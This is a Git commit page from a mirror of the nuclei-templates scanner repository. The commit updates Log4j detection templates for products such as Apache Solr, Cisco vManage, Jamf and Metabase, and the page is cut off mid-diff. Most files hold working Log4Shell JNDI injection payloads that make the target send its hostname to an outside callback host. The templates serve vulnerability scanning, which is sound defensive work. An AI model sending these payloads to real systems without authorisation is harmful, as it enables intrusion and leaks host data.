daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #7170 from projectdiscovery/update-log4j 

Update All Existing Log4j Templates
patch-1
Ritik Chaddha 2023-05-11 13:13:19 +05:30 committed by GitHub
parent f06f67f38d a40d92e53b
commit 9082cb7329
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
25 changed files with 399 additions and 127 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
.new-additions
View File

@ -1,51 +1,55 @@
file/keys/postman-api-key.yaml
headless/technologies/sap-spartacus.yaml
http/cves/2017/CVE-2017-17731.yaml
http/cves/2020/CVE-2020-27481.yaml
http/cves/2021/CVE-2021-27314.yaml
http/cves/2021/CVE-2021-27315.yaml
http/cves/2021/CVE-2021-27316.yaml
http/cves/2021/CVE-2021-27319.yaml
http/cves/2021/CVE-2021-27320.yaml
http/cves/2021/CVE-2021-30175.yaml
http/cves/2021/CVE-2021-44228.yaml
http/cves/2022/CVE-2022-24264.yaml
http/cves/2022/CVE-2022-24265.yaml
http/cves/2022/CVE-2022-24266.yaml
http/cves/2022/CVE-2022-24716.yaml
http/cves/2022/CVE-2022-27984.yaml
http/cves/2022/CVE-2022-27985.yaml
http/cves/2022/CVE-2022-3980.yaml
http/cves/2022/CVE-2022-42095.yaml
http/cves/2022/CVE-2022-42096.yaml
http/cves/2022/CVE-2022-4328.yaml
http/cves/2022/CVE-2022-45037.yaml
http/cves/2022/CVE-2022-45038.yaml
http/cves/2022/CVE-2022-46020.yaml
http/cves/2023/CVE-2023-1020.yaml
http/cves/2023/CVE-2023-1671.yaml
http/cves/2023/CVE-2023-20864.yaml
http/cves/2023/CVE-2023-25135.yaml
http/cves/2023/CVE-2023-26360.yaml
http/cves/2023/CVE-2023-27350.yaml
http/cves/2023/CVE-2023-27524.yaml
http/cves/2023/CVE-2023-29489.yaml
http/cves/2023/CVE-2023-29922.yaml
http/cves/2023/CVE-2023-30210.yaml
http/cves/2023/CVE-2023-30212.yaml
http/cves/2023/CVE-2023-31059.yaml
http/cves/2023/CVE-2023-32235.yaml
http/default-logins/powerjob-default-login.yaml
http/default-logins/umami/umami-default-login.yaml
http/exposed-panels/oracle-opera-login.yaml
http/exposed-panels/papercut-ng-panel.yaml
http/exposed-panels/proxmox-panel.yaml
http/exposed-panels/red-lion-panel.yaml
http/exposed-panels/sophos-web-appliance.yaml
http/exposures/tokens/postman/postman-key.yaml
http/misconfiguration/apache/apache-zeppelin-unauth.yaml
http/osint/mail-archive.yaml
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
http/vulnerabilities/wordpress/wpml-xss.yaml
cves/2017/CVE-2017-16894.yaml
cves/2020/CVE-2020-10199.yaml
cves/2021/CVE-2021-25078.yaml
cves/2021/CVE-2021-35250.yaml
cves/2022/CVE-2022-0747.yaml
cves/2022/CVE-2022-0769.yaml
cves/2022/CVE-2022-0773.yaml
cves/2022/CVE-2022-0846.yaml
cves/2022/CVE-2022-0864.yaml
cves/2022/CVE-2022-1903.yaml
cves/2022/CVE-2022-2219.yaml
cves/2022/CVE-2022-24223.yaml
cves/2022/CVE-2022-25485.yaml
cves/2022/CVE-2022-25486.yaml
cves/2022/CVE-2022-25487.yaml
cves/2022/CVE-2022-25488.yaml
cves/2022/CVE-2022-25489.yaml
cves/2022/CVE-2022-25497.yaml
cves/2022/CVE-2022-27926.yaml
cves/2022/CVE-2022-28032.yaml
cves/2022/CVE-2022-3062.yaml
cves/2022/CVE-2022-37190.yaml
cves/2022/CVE-2022-37191.yaml
cves/2022/CVE-2022-38295.yaml
cves/2022/CVE-2022-38296.yaml
cves/2022/CVE-2022-38467.yaml
cves/2022/CVE-2022-41441.yaml
cves/2022/CVE-2022-42094.yaml
cves/2022/CVE-2022-4321.yaml
cves/2023/CVE-2023-0099.yaml
cves/2023/CVE-2023-22620.yaml
cves/2023/CVE-2023-22897.yaml
cves/2023/CVE-2023-27008.yaml
cves/2023/CVE-2023-27159.yaml
cves/2023/CVE-2023-27179.yaml
cves/2023/CVE-2023-29084.yaml
default-logins/trassir/trassir-default-login.yaml
exposed-panels/appwrite-panel.yaml
exposed-panels/aspect-control-panel.yaml
exposures/logs/yii-error-page.yaml
misconfiguration/apollo-adminservice-unauth.yaml
misconfiguration/default-spx-key.yaml
misconfiguration/sql-server-report-viewer.yaml
misconfiguration/thinkphp-errors.yaml
network/detection/msmq-detect.yaml
network/enumeration/beanstalk-service.yaml
osint/hashnode.yaml
osint/imgbb.yaml
osint/rubygems.yaml
technologies/default-apache-shiro.yaml
technologies/switch-protocol.yaml
vulnerabilities/generic/cache-poisoning-xss.yaml
vulnerabilities/huawei/huawei-firewall-lfi.yaml
vulnerabilities/others/universal-media-xss.yaml
vulnerabilities/wordpress/ldap-wp-login-xss.yaml

10
http/cves/2021/CVE-2021-45046.yaml
View File

@ -55,19 +55,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/02/28

20
http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
View File

@ -22,12 +22,16 @@ info:
shodan-query: http.html:"Apache OFBiz"
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /webtools/control/main HTTP/1.1
Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27

21
http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
View File

@ -24,11 +24,15 @@ info:
shodan-query: http.html:"Apache Solr"
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 25s
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
@ -52,10 +56,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

28
http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -41,21 +45,31 @@ http:
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- type: word
part: body
words:
- "<title>Jamf Pro Login</title>"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27

16
http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml → http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
View File

@ -22,13 +22,17 @@ info:
shodan-query: title:"CloudCenter Suite"
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@timeout: 10s
POST /suite-auth/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
Content-Type: application/json
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@ -43,7 +47,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -55,10 +59,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/22

16
http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/ccmadmin/showHome.do
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04

16
http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -54,10 +58,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by CS 03/27/2023

20
http/vulnerabilities/code42/code42-log4j-rce.yaml
View File

@ -24,10 +24,14 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27

20
http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -48,13 +52,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23

20
http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and
matchers:
@ -47,13 +51,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23

16
http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
View File

@ -21,10 +21,14 @@ info:
verified: "true"
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
Host: {{Hostname}}
{
@ -44,17 +48,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04

16
http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -33,7 +37,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
cookie-reuse: true
matchers-condition: and
@ -46,7 +50,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: regex
@ -61,10 +65,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs 2022/10/10

16
http/vulnerabilities/other/graylog-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
matchers-condition: and
matchers:
@ -44,7 +48,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -56,10 +60,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23

16
http/vulnerabilities/other/metabase-log4j.yaml
View File

@ -20,10 +20,14 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
